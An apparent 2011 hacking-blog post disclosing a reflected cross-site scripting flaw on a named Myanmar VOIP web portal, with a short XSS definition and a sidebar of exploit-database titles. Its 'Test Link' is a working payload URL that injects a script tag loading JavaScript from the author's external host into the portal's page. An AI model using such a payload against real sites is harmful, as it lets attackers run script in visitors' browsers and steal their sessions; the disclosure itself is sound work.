critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Home / Hacking, News, Security / critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

September 28, 2011 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

[webapps] MoziloCMS 3.0 - Remote Code Execution (RCE)
on March 27, 2025 at 12:00 am
MoziloCMS 3.0 - Remote Code Execution (RCE)
[webapps] KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
on March 27, 2025 at 12:00 am
KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
[webapps] X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
on March 27, 2025 at 12:00 am
X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
[local] NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)
on March 26, 2025 at 12:00 am
NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)
[remote] Microsoft Windows - NTLM Hash Leak Malicious Windows Theme
on March 22, 2025 at 12:00 am
Microsoft Windows - NTLM Hash Leak Malicious Windows Theme

critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Explore More

Critical SQL Injection in mail4U is a production of Bagan Cybertech

Gmail/ Google apps down!

How To Bypass Ownership Permission